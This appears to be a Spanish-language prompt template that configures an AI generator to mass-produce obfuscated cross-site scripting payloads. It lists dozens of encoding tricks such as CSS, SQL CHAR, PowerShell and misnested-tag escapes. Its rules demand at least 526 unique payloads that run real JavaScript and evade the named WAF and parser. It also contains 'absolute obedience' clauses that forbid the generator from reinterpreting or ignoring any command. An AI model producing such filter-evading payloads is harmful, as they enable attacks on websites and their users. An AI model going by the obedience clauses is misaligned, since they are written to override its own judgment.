    #77:  Baudot encoding
    #78:  Radix-64 variant
    #79:  Hextobase64 chain
    #80:  HTML5 named entities (e.g. &amp;#x3C;)
    #81:  Java properties unicode (\u003c)
    #82:  CSS url() escapes url(\2f\2f)
    #83:  CSS string escapes "ab\000063"
    #84:  CSS content encoding counter()
    #85:  JSON unicode escapes (\u0061)
    #86:  YAML folded unicode
    #87:  Markdown HTML entity escaping
    #88:  LaTeX math mode entity encoding
    #89:  PDF hex string (<48656c6c6f>)
    #90:  PDF octal string (\110\145)
    #91:  Email punycode display-name
    #92:  MIME encoded-word (=?UTF-8?B?xxx?=)
    #93:  Domain literal escapes ([127\056\0x31])
    #94:  SQL char() encoding (CHAR(60,115))
    #95:  SQL hex encoding (0x3c7363)
    #96:  Shell printf encoding (printf '\x3c')
    #97:  PowerShell unicode escape (`u003c)
    #98:  Batch file caret escaping (^<)
    #99:  VBScript chr() encoding (chr(60))
    #100: HTML5 misnested encoding trick (<scr\0ipt>)
    #*: usar la última codificación usada
    #**: aplicar codificación solo a caracteres normales
    #a: mezclar varias codificaciones en distintas partes del payload
    #0:
    #00:
    #526+:

  


x19_codificacion_hibrida_especiales:
    #1: codificar SOLO los caracteres especiales < > / = ' "
    #2: codificar SOLO la mitad de los especiales (aleatorio)
    #3: codificar cada especial con un formato distinto (% &#x \x \u etc)
    #4: codificar solo los caracteres especiales y codificar cada caracter especial con un formato distinto (% &#x \x \u etc)
    #a: combinar todos los anteriores en un mismo payload



	
    #aa: activar combinaciones cruzadas entre TODAS las categorías activas (modo fusión total)





# 🛡️ BLOQUE CRÍTICO — Activar validación destructiva real
modo_validación: "estricto"

validacion_activa:
  ejecutar_en_cada_payload: true
  descartar_si_falla: true
  chequeos:
    - verificar_codificacion_por_caracter: true
    - rechazar_si_caracteres_especiales_sin_codificar: ['<','>','=','/','"',"'",'(',')']
    - rechazar_sin_etiquetas_validas: true
    - rechazar_sin_cierre_de_etiquetas: true
    - rechazar_sin_comillas_balanceadas: true
    - rechazar_si_no_ejecuta_js_real: true
    - rechazar_si_hash_duplicado: true
    - rechazar_si_x20_y_**_colisionan: true

⚠️ Esta plantilla obliga al generador a seguir exactamente los comandos, categorías, flags y reglas dadas.
No puede ignorar, reinterpretar ni sustituir valores.

# ⚙️ Campo de validación
modo_validación: "estricto"   # valores: estricto | flexible | off

# 🧩 1 — Limitaciones para controlar el caos
max_payload_base_length: 80
max_layers_per_payload: 6
min_unique_combinations: 526

# 🧩 2 — Validación de contenido estructural
validaciones_personalizadas:
  - rechazar_payloads_sin_etiquetas_validas: true
  - rechazar_payloads_sin_cierre_de_etiquetas: true
  - rechazar_payloads_sin_comillas_balanceadas: true
  - rechazar_payloads_duplicados_por_hash: true
  - rechazar_payloads_identicos_con_distinto_ofuscado: true
  - solo_aceptar_si_ejecuta_js_real: true

# 🧩 3 — Codificación real por carácter
codificacion:
  aplicar_por_caracter: true
  mezclar_formatos: true
  aplicar_fullwidth_solo_letras: true
  omitir_si_codificado_por_x20: true         # ⚡ evita que #** actúe sobre caracteres ya tocados por x20

# 🧩 4 — Anti-colisión y diversidad
anti_colision:
  comparar_hash_normalizado: true
  comparar_sin_ofuscacion: true
  entropia_minima: alta
  descartar_si_parecido: true

# 🧩 5 — Cobertura total obligatoria
cobertura_total: obligatoria

# 🧩 6 — Codificación híbrida de especiales (x20)
x20_codificacion_hibrida_especiales:
  #1: codificar SOLO los caracteres especiales < > / = ' "
  #2: codificar SOLO la mitad de los especiales (aleatorio)
  #3: codificar cada especial con un formato distinto (% &#x \x \u etc)
  #4: solo especiales y cada uno con un formato distinto
  #a: combinar todos los anteriores en un mismo payload

---

🧠 Reglas de ejecución

Si payload_input ≠ "2":
→ Modo automático: aplicar TODAS las categorías activas (x1–x20) según las combinaciones permitidas
usando #*, #**, #a, #aa, #526+ y #00,
y generar payload_count variantes creativas.

Si payload_input = "2":
→ Modo manual: usar exclusivamente los valores que indique el usuario para cada categoría
(sin añadir, quitar o alterar nada que no haya sido escrito por el usuario).

---

📌 Reglas técnicas obligatorias

- Cada categoría acepta múltiples parámetros separados por `,` (ej: #1,#5,#70)
- #a → combinar todos los parámetros de esa categoría
- #aa → combinar entre TODAS las categorías activas
- #* → reutilizar el último valor elegido automáticamente
- #** → aplicar ofuscación carácter por carácter (excepto especiales y omitiendo los ya tocados por x20)
- #0 → omitir la categoría
- #00 → IA libre si no hay parámetros
- #526+ → generar al menos 526 combinaciones reales
- Se permiten alias x1–x20

---

📌 Reglas de obediencia absoluta

- No puede añadir, quitar, sustituir ni ignorar parámetros
- Cada payload aplica TODAS las categorías activas
- Debe incluir ~10% de payloads en texto plano (sin x20)
- Debe insertar esos payloads de texto plano dispersos entre los demás
- No puede decidir qué codificar: solo lo que indiquen los comandos activos 
---

📌 Reglas de control absoluto

- No usar aleatoriedad libre ni conocimiento implícito
- Si una categoría tiene #526+ → generar al menos esa cantidad de combinaciones reales
- Si tiene múltiples parámetros (#1,#2,#3,#a) → generar combinaciones cruzadas de todos
- No alterar orden de caracteres salvo si la ofuscación lo indica
- Validar cada payload: si falla una regla → descartarlo y regenerar
- Salida: solo los payloads en crudo, uno por línea

---

📌 Reglas de consistencia estructural

- Cada payload debe ser HTML/JS válido completo
- Si hay Mutation XSS → validar que ejecuta JS real tras la mutación
- No se permiten payloads incompletos

---

📌 Reglas anti-colisión

- Comparar hash normalizado con todos los previos
- Si es igual o parecido → descartarlo y regenerar

---

📌 Reglas de cobertura total

- Si hay parámetros múltiples (#1,#2,#3,#a) → marcar cuáles ya se usaron
- No puede terminar hasta haber usado todas las combinaciones posibles

---

📌 Validación de salida

✔ Patrón completamente único  
✔ Adaptado al contexto indicado  
✔ ~10% de payloads en texto plano  
✔ Evasión efectiva del parser  
✔ Compatibles con el framework y el WAF indicados  
✔ Alta entropía y creatividad (modo varios Aquiles trabajando a la vez)